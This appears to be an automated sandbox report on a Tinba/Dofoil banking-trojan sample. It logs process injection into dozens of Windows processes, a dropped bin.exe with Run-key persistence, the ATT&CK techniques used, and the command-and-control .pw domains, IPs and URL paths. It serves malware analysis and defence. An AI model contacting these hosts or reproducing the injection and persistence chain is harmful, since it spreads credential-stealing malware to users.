            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: 88090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 98090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\backgroundTaskHost.exe EIP: C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: A2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 307090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 2CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 64090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 6D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 2EF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 147090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 116090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 1FF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 263090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 81090BJump to behavior
Source: C:\Windows\explorer.exe | Thread created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe EIP: 1C090B
Source: C:\Windows\explorer.exe | Thread created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe EIP: 1C090B
Source: C:\Windows\SysWOW64\winver.exe | Memory written: PID: 2580 base: 1390000 value: 50
Source: C:\Windows\SysWOW64\winver.exe | Memory written: PID: 2580 base: 3450000 value: 50
Source: C:\Users\user\Desktop\java.exe | Memory written: C:\Windows\SysWOW64\winver.exe base: D018B0
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\explorer.exe base: 1390000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\sihost.exe base: AC0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe base: 910000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe base: 9A0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\ctfmon.exe base: A50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\explorer.exe base: 3450000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe base: D40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 110000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 290000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 190000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe base: 9F0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\conhost.exe base: 880000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\dllhost.exe base: 980000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\backgroundTaskHost.exe base: C0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: A20000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 60000
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe base: 1C0000
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe base: 1C0000
Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
Source: java.exe, 00000000.00000002.1731963218.0000000002220000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1712577983.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: winver.exe, 00000002.00000002.2970934204.0000000000C9C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tShell_TrayWnd
Source: explorer.exe, 00000003.00000002.2995654368.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1712810121.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000004.00000002.3004140037.000001CD41220000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\java.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133474217072615071.txt VolumeInformation
Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Queries volume information: C:\ VolumeInformation
MITRE ATT&CK matrix (numbers in parentheses are the counts shown next to the technique in the original matrix; empty cells were empty in the original):

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Exploitation for Client Execution (1) | Registry Run Keys / Startup Folder (11) | Process Injection (512) | Rootkit (3) | Credential API Hooking (1) | Security Software Discovery (111) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (21) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information |
| Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (11) | Masquerading (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Archive Collected Data (11) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials |
| Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | Security Account Manager | Process Discovery (3) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | | | Data Encrypted for Impact | DNS Server | Email Addresses |
| Local Accounts | Cron | Login Hook | Login Hook | Process Injection (512) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Traffic Duplication | Application Layer Protocol (13) | | | Data Destruction | Virtual Private Server | Employee Names |
| Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information |
| Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Hidden Files and Directories (1) | Cached Domain Credentials | System Information Discovery (111) | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties |
| External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (21) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS |
| Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Exfiltration Over Alternative Protocol | Application Layer Protocol | | | Defacement | Serverless | Network Trust Dependencies |
| Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Web Protocols | | | Internal Defacement | Malvertising | Network Topology |
Behavior Graph ID: 1364228, Sample: java.exe, Startdate: 19/12/2023, Architecture: WINDOWS, Score: 100

• Start node: vcklmnnejwxx.pw, uyhgqunqkxnx.pw and 2 other IPs or domains; signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 6 other signatures. Starts java.exe.
• java.exe: signatures: Exploit detected, runtime environment starts unknown processes; Writes to foreign memory regions. Starts winver.exe and conhost.exe.
• winver.exe: contacts cmnsgscccrej.pw (216.218.185.162, ports 49735, 49737, 49738, HURRICANEUS, United States) and uyhgqunqkxnx.pw (104.131.68.180, ports 49736, 80, DIGITALOCEAN-ASNUS, United States); drops C:\Users\user\AppData\Roaming\...\bin.exe (PE32); signatures: Creates autostart registry keys with suspicious names; Contains functionality to inject threads in other processes; Injects code into the Windows Explorer (explorer.exe); 4 other signatures. Injects into explorer.exe, SearchApp.exe, sihost.exe and 32 other processes.
• explorer.exe (injected): signatures: Contains functionality to inject threads in other processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection). Starts bin.exe twice.
• SearchApp.exe (injected): contacts 173.222.162.32 (ports 443, 49730, AKAMAI-ASUS, United States).
• bin.exe (both instances): signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file. Each starts a conhost.exe.

Source                                           Detection   Scanner          Label
java.exe                                         89%         ReversingLabs    Win32.Downloader.Dofoil
java.exe                                         100%        Avira            HEUR/AGEN.1322420
java.exe                                         100%        Joe Sandbox ML

Source                                           Detection   Scanner          Label
C:\Users\user\AppData\Roaming\E38A1E29\bin.exe   100%        Avira            HEUR/AGEN.1322420
C:\Users\user\AppData\Roaming\E38A1E29\bin.exe   100%        Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
Name               IP                Active   Malicious   Antivirus Detection   Reputation
vcklmnnejwxx.pw    216.218.185.162   true     true                              unknown
uyhgqunqkxnx.pw    104.131.68.180    true     true                              unknown
spaines.pw         216.218.185.162   true     true                              unknown
cmnsgscccrej.pw    216.218.185.162   true     true                              unknown
Name                                   Malicious   Antivirus Detection        Reputation
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/     true        Avira URL Cloud: malware   unknown
http://spaines.pw/EiDQjNbWEQ/          true        Avira URL Cloud: malware   unknown
http://cmnsgscccrej.pw/EiDQjNbWEQ/     true        Avira URL Cloud: malware   unknown
http://vcklmnnejwxx.pw/EiDQjNbWEQ/     true        Avira URL Cloud: malware   unknown
                                                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://raka.rms_noco-VKSearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://searchapp.bundleassets.example/desktop/2.htmlSearchApp.exe, 0000000B.00000000.1834242505.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://assets.activity.windows.comersvchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmSearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://assets.activity.windows.comssvchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://activity.windows.comtsvchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://login.windows.local/svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://fb.me/react-polyfillsSearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://api.msn.com/explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://assets.activity.windows.comsvchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://activity.windows.comsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://excel.office.comcpStartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://assets.activity.windows.com/v1/assets/$batchsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      low
Reputation legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
216.218.185.162 | vcklmnnejwxx.pw | United States | | 6939 | HURRICANEUS | true
104.131.68.180 | uyhgqunqkxnx.pw | United States | | 14061 | DIGITALOCEAN-ASNUS | true
173.222.162.32 | unknown | United States | | 35994 | AKAMAI-ASUS | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1364228
Start date and time: 2023-12-19 00:40:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 35
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: java.exe
Detection: MAL
Classification: mal100.bank.expl.evad.winEXE@10/10@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 123
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: java.exe
Time | Type | Description
00:41:03 | API Interceptor | 581x Sleep call for process: explorer.exe modified
00:41:10 | API Interceptor | 1x Sleep call for process: winver.exe modified
23:41:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E38A1E29 C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
23:41:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E38A1E29 C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
216.218.185.162 | 3G36K54KKw.exe | malicious | Tinba | ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/
216.218.185.162 | http://hbjtorutqkl.org | malicious | Unknown | hbjtorutqkl.org/
216.218.185.162 | http://www.paypr.com | malicious | Unknown | www.paypr.com/
216.218.185.162 | Fxj6eiNUQ1.exe | malicious | Unknown | mypark.cc/qa/
216.218.185.162 | 1boDHMvtCl.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/
216.218.185.162 | N7B5dyjbIS.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/
216.218.185.162 | bhiDwU4Geh.exe | malicious | Tinba | qvvksmeemfgd.com/spam/
216.218.185.162 | K73CgOgVZ9.exe | malicious | Tinba | qvvksmeemfgd.com/spam/
216.218.185.162 | I90gcqKK3m.exe | malicious | Tinba | ggvruxovlbrm.com/spam/
216.218.185.162 | KlNXUPV2V9.exe | malicious | Tinba | qvvksmeemfgd.com/spam/
216.218.185.162 | 26cCgegATh.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
216.218.185.162 | 4jNfjcMzST.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
216.218.185.162 | PFubud554p.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/
216.218.185.162 | xST04RvuDH.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
216.218.185.162 | rTv7jUz1P5.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
216.218.185.162 | 6phPAtxcUR.exe | malicious | Tinba | cmnsgscccrej.pw/EiDQjNbWEQ/
216.218.185.162 | IPwhmF3OZ3.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/
216.218.185.162 | sZ8q0q3VNz.exe | malicious | Tinba | vcklmnnejwxx.pw/EiDQjNbWEQ/
216.218.185.162 | W7jhZtyX7H.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
216.218.185.162 | j6qWx4m2sT.exe | malicious | Tinba | spaines.pw/EiDQjNbWEQ/
173.222.162.32 | p2pWin.exe | malicious | Petya / NotPetya, Mimikatz |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
uyhgqunqkxnx.pw | 1boDHMvtCl.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | N7B5dyjbIS.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | PFubud554p.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | 6phPAtxcUR.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | IPwhmF3OZ3.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | sZ8q0q3VNz.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | deOHDeSfAr.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | o2tow8Yiis.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | S6bS8zCitm.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | eddLVK4Ak8.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | oaCC6gQGMe.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | Mb5ahRznK0.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | cBn0fkHo3x.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | s81nbT3Zep.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | tHgi7eqSU8.exe | malicious | Tinba | 192.42.116.41
uyhgqunqkxnx.pw | Se7RDF9xyE.exe | malicious | Tinba | 192.42.116.41
